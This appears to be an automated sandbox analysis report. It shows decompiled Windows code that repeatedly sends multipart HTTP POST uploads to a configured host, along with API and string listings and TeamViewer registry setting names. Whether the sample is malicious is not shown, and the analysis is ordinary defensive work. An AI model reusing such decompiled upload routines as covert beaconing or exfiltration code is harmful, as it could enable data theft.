                                                                                                                        					InternetSetOptionA(_t152, 5, _t156 + 0x14, 4);
                                                                                                                        					InternetSetOptionA(_t152, 6, _t156 + 0x14, 4);
                                                                                                                        					asm("sbb ecx, ecx");
                                                                                                                        					_t147 = InternetConnectA(_t152,  *(_t150 + 4), ( ~( *(_t150 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
                                                                                                                        					 *(_t156 + 0x34) = _t147;
                                                                                                                        					if(_t147 == 0) {
                                                                                                                        						L26:
                                                                                                                        						InternetCloseHandle(_t152);
                                                                                                                        						if( *(_t156 + 0x1c) != 0) {
                                                                                                                        							goto L32;
                                                                                                                        						}
                                                                                                                        						_t146 =  *((intOrPtr*)(_t156 + 0x38));
                                                                                                                        						goto L28;
                                                                                                                        					}
                                                                                                                        					_t82 = HttpOpenRequestA(_t147, "POST",  *(_t150 + 8), "HTTP/1.1", 0, 0,  *(_t156 + 0x18), 0); // executed
                                                                                                                        					_t122 = _t82;
                                                                                                                        					if(_t122 == 0) {
                                                                                                                        						L25:
                                                                                                                        						InternetCloseHandle(_t147);
                                                                                                                        						goto L26;
                                                                                                                        					}
                                                                                                                        					_t151 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        					if(_t151 == 0) {
                                                                                                                        						L24:
                                                                                                                        						InternetCloseHandle(_t122);
                                                                                                                        						_t147 =  *(_t156 + 0x34);
                                                                                                                        						goto L25;
                                                                                                                        					}
                                                                                                                        					_t87 = wsprintfA(_t151, "%s", "Connection: close\r\n");
                                                                                                                        					_t156 = _t156 + 0xc;
                                                                                                                        					HttpAddRequestHeadersA(_t122, _t151, _t87, 0xa0000000);
                                                                                                                        					_t153 = 0;
                                                                                                                        					 *((intOrPtr*)(_t156 + 0x24)) = 0;
                                                                                                                        					 *((intOrPtr*)(_t156 + 0x28)) = 0;
                                                                                                                        					 *(_t156 + 0x18) = 0;
                                                                                                                        					 *(_t156 + 0x30) = GetTickCount();
                                                                                                                        					 *(_t156 + 0x1c) = RtlRandom(_t156 + 0x2c);
                                                                                                                        					_t149 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        					if(_t149 != 0) {
                                                                                                                        						 *(_t156 + 0x34) = _t149;
                                                                                                                        						_t153 = wsprintfA(_t149, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t156 + 0x14),  *(_t156 + 0x44));
                                                                                                                        						_t30 = _t153 + 1; // 0x1
                                                                                                                        						_t114 = _t149 + _t30;
                                                                                                                        						 *(_t156 + 0x44) = _t114;
                                                                                                                        						_t115 = wsprintfA(_t114, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t156 + 0x24)));
                                                                                                                        						_t133 =  *((intOrPtr*)(_t156 + 0x5c));
                                                                                                                        						 *(_t156 + 0x34) = _t115;
                                                                                                                        						_t116 = wsprintfA(_t151, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t133 + 0x18)) + _t115 + _t153);
                                                                                                                        						_t157 = _t156 + 0x28;
                                                                                                                        						HttpAddRequestHeadersA(_t122, _t151, _t116, 0xa0000000);
                                                                                                                        						_t119 = wsprintfA(_t151, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t157 + 0x14)));
                                                                                                                        						_t156 = _t157 + 0xc;
                                                                                                                        						HttpAddRequestHeadersA(_t122, _t151, _t119, 0xa0000000);
                                                                                                                        					}
                                                                                                                        					_t93 = HttpSendRequestExA(_t122, 0, 0, 0, 0); // executed
                                                                                                                        					if(_t93 == 0) {
                                                                                                                        						if(GetLastError() == 0x2f7d) {
                                                                                                                        							 *( *((intOrPtr*)(_t156 + 0x40)) + 0xc) = 0;
                                                                                                                        						}
                                                                                                                        						L21:
                                                                                                                        						if(_t149 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t149);
                                                                                                                        						}
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t151);
                                                                                                                        						_t152 =  *(_t156 + 0x30);
                                                                                                                        						goto L24;
                                                                                                                        					}
                                                                                                                        					 *((intOrPtr*)(_t156 + 0x20)) = _t153;
                                                                                                                        					_t100 = E6F3354E0(_t122,  *((intOrPtr*)(_t156 + 0x24)), _t156 + 0x14);
                                                                                                                        					_t156 = _t156 + 0xc;
                                                                                                                        					_t154 =  *((intOrPtr*)(_t156 + 0x40));
                                                                                                                        					if(_t100 != _t153) {
                                                                                                                        						L19:
                                                                                                                        						HttpEndRequestA(_t122, 0, 0, 0);
                                                                                                                        						if( *(_t156 + 0x1c) != 0) {
                                                                                                                        							_t102 = E6F335540(_t122, _t154 + 0x2c);
                                                                                                                        							_t156 = _t156 + 8;
                                                                                                                        							 *((intOrPtr*)(_t156 + 0x20)) = _t102;
                                                                                                                        						}
                                                                                                                        						goto L21;
                                                                                                                        					}
                                                                                                                        					_t103 = _t154 + 0x18;
                                                                                                                        					if( *((intOrPtr*)(_t154 + 0x18)) == 0) {
                                                                                                                        						L13:
                                                                                                                        						_t104 = _t154 + 0x20;
                                                                                                                        						if( *((intOrPtr*)(_t154 + 0x20)) == 0) {
                                                                                                                        							L15:
                                                                                                                        							_t105 = _t154 + 0x28;
                                                                                                                        							if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
                                                                                                                        								L17:
                                                                                                                        								 *(_t156 + 0x30) =  *(_t156 + 0x18);
                                                                                                                        								_t107 = E6F3354E0(_t122,  *((intOrPtr*)(_t156 + 0x28)), _t156 + 0x24);
                                                                                                                        								_t156 = _t156 + 0xc;
                                                                                                                        								if(_t107 ==  *(_t156 + 0x18)) {
                                                                                                                        									 *(_t156 + 0x1c) = 1;
                                                                                                                        								}
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							_t108 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x24)), _t105);
                                                                                                                        							_t156 = _t156 + 0xc;
                                                                                                                        							if(_t108 !=  *((intOrPtr*)(_t154 + 0x28))) {
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							goto L17;
                                                                                                                        						}
                                                                                                                        						_t109 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x1c)), _t104);
                                                                                                                        						_t156 = _t156 + 0xc;
                                                                                                                        						if(_t109 !=  *((intOrPtr*)(_t154 + 0x20))) {
                                                                                                                        							goto L19;
                                                                                                                        						}
                                                                                                                        						goto L15;
                                                                                                                        					}
                                                                                                                        					_t111 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x14)), _t103);
                                                                                                                        					_t156 = _t156 + 0xc;
                                                                                                                        					if(_t111 !=  *((intOrPtr*)(_t154 + 0x18))) {
                                                                                                                        						goto L19;
                                                                                                                        					}
                                                                                                                        					goto L13;
                                                                                                                        				}
                                                                                                                        			}
































                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3356A1
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000001,00000000,00000000,00000000), ref: 6F3356E8
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6F335714
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6F335720
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6F33572C
                                                                                                                        • InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6F33574E
                                                                                                                        • HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6F33577C
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F335793
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3357A0
                                                                                                                        • wsprintfA.USER32 ref: 6F3357B7
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F3357C8
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3357DC
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F3357EB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3357FC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335803
                                                                                                                        • wsprintfA.USER32 ref: 6F335823
                                                                                                                        • wsprintfA.USER32 ref: 6F33583E
                                                                                                                        • wsprintfA.USER32 ref: 6F335860
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335871
                                                                                                                        • wsprintfA.USER32 ref: 6F335882
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335893
                                                                                                                        • HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6F3358A2
                                                                                                                        • HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6F335953
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335978
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33597F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335988
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33598F
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F33599A
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359A5
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359AC
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3359BD
                                                                                                                        • Sleep.KERNEL32(00001388), ref: 6F3359CC
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3359D7
                                                                                                                        Strings
                                                                                                                        • ----------%lu--, xrefs: 6F335834
                                                                                                                        • Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6F33587C
                                                                                                                        • Content-Length: %lu, xrefs: 6F33585A
                                                                                                                        • Connection: close, xrefs: 6F3357AC
                                                                                                                        • POST, xrefs: 6F335776
                                                                                                                        • ----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6F335819
                                                                                                                        • HTTP/1.1, xrefs: 6F335770
                                                                                                                        • N, xrefs: 6F33570C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseCountHandleHeadersOptionTick$AllocFreeOpen$ConnectErrorLastRandomSendSleep
                                                                                                                        • String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
                                                                                                                        • API String ID: 2546452625-2948876467
                                                                                                                        • Opcode ID: 7ea32a9263ea2d0d4593151da6547690d3d73eaba6db73f7a05648d3d57ff80b
                                                                                                                        • Instruction ID: f412cc8f9967b57926f4c2b9cbef0be47c390b5ab26ad302e6127e584bc072b0
                                                                                                                        • Opcode Fuzzy Hash: 7ea32a9263ea2d0d4593151da6547690d3d73eaba6db73f7a05648d3d57ff80b
                                                                                                                        • Instruction Fuzzy Hash: A5A1CFB290438AAFD750DF24CC89F6B7BEDEF89725F00051CFA4596180DB74E8548BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C26EB
                                                                                                                          • Part of subcall function 004D8D4F: __EH_prolog3_catch_GS.LIBCMT ref: 004D8D56
                                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,0000003C,004D8EFD,?,?), ref: 004D8DAB
                                                                                                                          • Part of subcall function 004D85BC: __EH_prolog3.LIBCMT ref: 004D85C3
                                                                                                                          • Part of subcall function 004D85BC: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,00000008,004C2410), ref: 004D85F6
                                                                                                                          • Part of subcall function 004BD13E: __EH_prolog3.LIBCMT ref: 004BD145
                                                                                                                          • Part of subcall function 004D849A: __EH_prolog3.LIBCMT ref: 004D84A1
                                                                                                                          • Part of subcall function 004D849A: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,?,?,?,?,?,00000008,004C3112,Logging), ref: 004D84D4
                                                                                                                          • Part of subcall function 004D8D4F: _wmemset.LIBCPMT ref: 004D8DEE
                                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004D8E13
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3QueryValue$H_prolog3_catch__wmemset
                                                                                                                        • String ID: 0.96$CUse$ClientIC$ClientID$CustomRouter$GatewayAllowed$Gatewayname$HttpThreadLimit$IPCConnectPort$IPCListenPort$Init: Load Registry Settings failed [HKEY_SOFTWARE] (.\Global.cpp, 521)$InstallationDirectory$LastKeepalivePerformance$LastRouterPerformance$LicenseType$LimitForGetInsteadPost$ListenHttp$Logging$MaxHttpPacketSizeWithPriorization$MaxPacketSizeWithPriorization$MinimizeToTray$SecurityPasswordAES$Security_Password$Security_Password_Secure$ServerPassword$ServerPasswordAES$ServerPasswordSecure$TcpThreadLimit$TotalSessions$TotalTrafficKilobytes$UseTestMasterKeys$UseTestServer$Version$VpnIP$master.dyngate.com$master.teamviewer.com$tVmore$ecure$useUDP
                                                                                                                        • API String ID: 4186790705-3214323485
                                                                                                                        • Opcode ID: 60d9c34638034813ccc26071b3d6d61201406b0e105d1ca806b055958f7b1c15
                                                                                                                        • Instruction ID: f78076c062f6ca7fd13033a47dd0d286148e18dc9ca1db24686cad4d793e2d17
                                                                                                                        • Opcode Fuzzy Hash: 60d9c34638034813ccc26071b3d6d61201406b0e105d1ca806b055958f7b1c15
                                                                                                                        • Instruction Fuzzy Hash: C562C2709052C8EACF15FB79C926ADE7FA45F21308F1440AEF44127292DB795B08DB6B
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F3356B3() {
                                                                                                                        				char* _t65;
                                                                                                                        				void* _t76;
                                                                                                                        				long _t81;
                                                                                                                        				int _t87;
                                                                                                                        				void* _t94;
                                                                                                                        				intOrPtr _t96;
                                                                                                                        				void* _t97;
                                                                                                                        				void* _t98;
                                                                                                                        				void* _t99;
                                                                                                                        				void* _t101;
                                                                                                                        				void* _t102;
                                                                                                                        				void* _t103;
                                                                                                                        				void* _t105;
                                                                                                                        				CHAR* _t108;
                                                                                                                        				int _t109;
                                                                                                                        				long _t110;
                                                                                                                        				long _t113;
                                                                                                                        				void* _t117;
                                                                                                                        				intOrPtr _t141;
                                                                                                                        				void* _t143;
                                                                                                                        				void* _t145;
                                                                                                                        				intOrPtr _t146;
                                                                                                                        				void* _t148;
                                                                                                                        				void* _t149;
                                                                                                                        				int _t151;
                                                                                                                        				intOrPtr _t152;
                                                                                                                        				void* _t154;
                                                                                                                        				void* _t156;
                                                                                                                        
                                                                                                                        				while(1) {
                                                                                                                        					_t146 =  *((intOrPtr*)(_t154 + 0x40));
                                                                                                                        					 *(_t154 + 0x18) = 0x842a0000;
                                                                                                                        					if( *(_t146 + 0xc) != 0) {
                                                                                                                        						 *(_t154 + 0x18) = 0x84aa3300;
                                                                                                                        					}
                                                                                                                        					_t65 = M6F340518; // 0x749bb0
                                                                                                                        					_t149 = InternetOpenA(_t65, 1, 0, 0, 0);
                                                                                                                        					 *(_t154 + 0x30) = _t149;
                                                                                                                        					if(_t149 == 0) {
                                                                                                                        						L28:
                                                                                                                        						if(GetTickCount() >= _t141) {
                                                                                                                        							L32:
                                                                                                                        							return  *((intOrPtr*)(_t154 + 0x20));
                                                                                                                        						}
                                                                                                                        						Sleep(0x1388);
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					 *((intOrPtr*)(_t154 + 0x20)) = 0x4e20;
                                                                                                                        					InternetSetOptionA(_t149, 2, _t154 + 0x14, 4);
                                                                                                                        					InternetSetOptionA(_t149, 5, _t154 + 0x14, 4);
                                                                                                                        					InternetSetOptionA(_t149, 6, _t154 + 0x14, 4);
                                                                                                                        					asm("sbb ecx, ecx");
                                                                                                                        					_t143 = InternetConnectA(_t149,  *(_t146 + 4), ( ~( *(_t146 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
                                                                                                                        					 *(_t154 + 0x34) = _t143;
                                                                                                                        					if(_t143 == 0) {
                                                                                                                        						L26:
                                                                                                                        						InternetCloseHandle(_t149);
                                                                                                                        						if( *(_t154 + 0x1c) != 0) {
                                                                                                                        							goto L32;
                                                                                                                        						}
                                                                                                                        						_t141 =  *((intOrPtr*)(_t154 + 0x38));
                                                                                                                        						goto L28;
                                                                                                                        					}
                                                                                                                        					_t76 = HttpOpenRequestA(_t143, "POST",  *(_t146 + 8), "HTTP/1.1", 0, 0,  *(_t154 + 0x18), 0); // executed
                                                                                                                        					_t117 = _t76;
                                                                                                                        					if(_t117 == 0) {
                                                                                                                        						L25:
                                                                                                                        						InternetCloseHandle(_t143);
                                                                                                                        						goto L26;
                                                                                                                        					}
                                                                                                                        					_t148 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        					if(_t148 == 0) {
                                                                                                                        						L24:
                                                                                                                        						InternetCloseHandle(_t117);
                                                                                                                        						_t143 =  *(_t154 + 0x34);
                                                                                                                        						goto L25;
                                                                                                                        					}
                                                                                                                        					_t81 = wsprintfA(_t148, "%s", "Connection: close\r\n");
                                                                                                                        					_t154 = _t154 + 0xc;
                                                                                                                        					HttpAddRequestHeadersA(_t117, _t148, _t81, 0xa0000000);
                                                                                                                        					_t151 = 0;
                                                                                                                        					 *((intOrPtr*)(_t154 + 0x24)) = 0;
                                                                                                                        					 *((intOrPtr*)(_t154 + 0x28)) = 0;
                                                                                                                        					 *(_t154 + 0x18) = 0;
                                                                                                                        					 *(_t154 + 0x30) = GetTickCount();
                                                                                                                        					 *(_t154 + 0x1c) = RtlRandom(_t154 + 0x2c);
                                                                                                                        					_t145 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        					if(_t145 != 0) {
                                                                                                                        						 *(_t154 + 0x34) = _t145;
                                                                                                                        						_t151 = wsprintfA(_t145, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t154 + 0x14),  *(_t154 + 0x44));
                                                                                                                        						_t26 = _t151 + 1; // 0x1
                                                                                                                        						_t108 = _t145 + _t26;
                                                                                                                        						 *(_t154 + 0x44) = _t108;
                                                                                                                        						_t109 = wsprintfA(_t108, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t154 + 0x24)));
                                                                                                                        						_t128 =  *((intOrPtr*)(_t154 + 0x5c));
                                                                                                                        						 *(_t154 + 0x34) = _t109;
                                                                                                                        						_t110 = wsprintfA(_t148, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t128 + 0x18)) + _t109 + _t151);
                                                                                                                        						_t156 = _t154 + 0x28;
                                                                                                                        						HttpAddRequestHeadersA(_t117, _t148, _t110, 0xa0000000);
                                                                                                                        						_t113 = wsprintfA(_t148, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t156 + 0x14)));
                                                                                                                        						_t154 = _t156 + 0xc;
                                                                                                                        						HttpAddRequestHeadersA(_t117, _t148, _t113, 0xa0000000);
                                                                                                                        					}
                                                                                                                        					_t87 = HttpSendRequestExA(_t117, 0, 0, 0, 0); // executed
                                                                                                                        					if(_t87 == 0) {
                                                                                                                        						if(GetLastError() == 0x2f7d) {
                                                                                                                        							 *( *((intOrPtr*)(_t154 + 0x40)) + 0xc) = 0;
                                                                                                                        						}
                                                                                                                        						L21:
                                                                                                                        						if(_t145 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t145);
                                                                                                                        						}
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t148);
                                                                                                                        						_t149 =  *(_t154 + 0x30);
                                                                                                                        						goto L24;
                                                                                                                        					}
                                                                                                                        					 *((intOrPtr*)(_t154 + 0x20)) = _t151;
                                                                                                                        					_t94 = E6F3354E0(_t117,  *((intOrPtr*)(_t154 + 0x24)), _t154 + 0x14);
                                                                                                                        					_t154 = _t154 + 0xc;
                                                                                                                        					_t152 =  *((intOrPtr*)(_t154 + 0x40));
                                                                                                                        					if(_t94 != _t151) {
                                                                                                                        						L19:
                                                                                                                        						HttpEndRequestA(_t117, 0, 0, 0);
                                                                                                                        						if( *(_t154 + 0x1c) != 0) {
                                                                                                                        							_t96 = E6F335540(_t117, _t152 + 0x2c);
                                                                                                                        							_t154 = _t154 + 8;
                                                                                                                        							 *((intOrPtr*)(_t154 + 0x20)) = _t96;
                                                                                                                        						}
                                                                                                                        						goto L21;
                                                                                                                        					}
                                                                                                                        					_t97 = _t152 + 0x18;
                                                                                                                        					if( *((intOrPtr*)(_t152 + 0x18)) == 0) {
                                                                                                                        						L13:
                                                                                                                        						_t98 = _t152 + 0x20;
                                                                                                                        						if( *((intOrPtr*)(_t152 + 0x20)) == 0) {
                                                                                                                        							L15:
                                                                                                                        							_t99 = _t152 + 0x28;
                                                                                                                        							if( *((intOrPtr*)(_t152 + 0x28)) == 0) {
                                                                                                                        								L17:
                                                                                                                        								 *(_t154 + 0x30) =  *(_t154 + 0x18);
                                                                                                                        								_t101 = E6F3354E0(_t117,  *((intOrPtr*)(_t154 + 0x28)), _t154 + 0x24);
                                                                                                                        								_t154 = _t154 + 0xc;
                                                                                                                        								if(_t101 ==  *(_t154 + 0x18)) {
                                                                                                                        									 *(_t154 + 0x1c) = 1;
                                                                                                                        								}
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							_t102 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x24)), _t99);
                                                                                                                        							_t154 = _t154 + 0xc;
                                                                                                                        							if(_t102 !=  *((intOrPtr*)(_t152 + 0x28))) {
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							goto L17;
                                                                                                                        						}
                                                                                                                        						_t103 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x1c)), _t98);
                                                                                                                        						_t154 = _t154 + 0xc;
                                                                                                                        						if(_t103 !=  *((intOrPtr*)(_t152 + 0x20))) {
                                                                                                                        							goto L19;
                                                                                                                        						}
                                                                                                                        						goto L15;
                                                                                                                        					}
                                                                                                                        					_t105 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x14)), _t97);
                                                                                                                        					_t154 = _t154 + 0xc;
                                                                                                                        					if(_t105 !=  *((intOrPtr*)(_t152 + 0x18))) {
                                                                                                                        						goto L19;
                                                                                                                        					}
                                                                                                                        					goto L13;
                                                                                                                        				}
                                                                                                                        			}
































                                                                                                                        APIs
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000001,00000000,00000000,00000000), ref: 6F3356E8
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6F335714
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6F335720
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6F33572C
                                                                                                                        • InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6F33574E
                                                                                                                        • HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6F33577C
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F335793
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3357A0
                                                                                                                        • wsprintfA.USER32 ref: 6F3357B7
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F3357C8
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3357DC
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F3357EB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3357FC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335803
                                                                                                                        • wsprintfA.USER32 ref: 6F335823
                                                                                                                        • wsprintfA.USER32 ref: 6F33583E
                                                                                                                        • wsprintfA.USER32 ref: 6F335860
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335871
                                                                                                                        • wsprintfA.USER32 ref: 6F335882
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335893
                                                                                                                        • HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6F3358A2
                                                                                                                        • HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6F335953
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335978
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33597F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335988
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33598F
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F33599A
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359A5
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359AC
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3359BD
                                                                                                                        • Sleep.KERNEL32(00001388), ref: 6F3359CC
                                                                                                                        Strings
                                                                                                                        • ----------%lu--, xrefs: 6F335834
                                                                                                                        • Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6F33587C
                                                                                                                        • Content-Length: %lu, xrefs: 6F33585A
                                                                                                                        • Connection: close, xrefs: 6F3357AC
                                                                                                                        • POST, xrefs: 6F335776
                                                                                                                        • ----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6F335819
                                                                                                                        • HTTP/1.1, xrefs: 6F335770
                                                                                                                        • N, xrefs: 6F33570C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseHandleHeadersOption$AllocCountFreeOpenTick$ConnectRandomSendSleep
                                                                                                                        • String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
                                                                                                                        • API String ID: 1438124730-2948876467
                                                                                                                        • Opcode ID: df19d0c201741c97b306c486ca984b4fc86e0f28d2163465dfd1d885eac4ca06
                                                                                                                        • Instruction ID: 2d51272c1173d9ffcb8a03b69d0064296ed9a9be5b73b236c802b838761fdf0f
                                                                                                                        • Opcode Fuzzy Hash: df19d0c201741c97b306c486ca984b4fc86e0f28d2163465dfd1d885eac4ca06
                                                                                                                        • Instruction Fuzzy Hash: A291B0B290478AAFD760DF24CC89F6B77ADEF88725F00050CFA4596181DB74F8548BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E210B
                                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
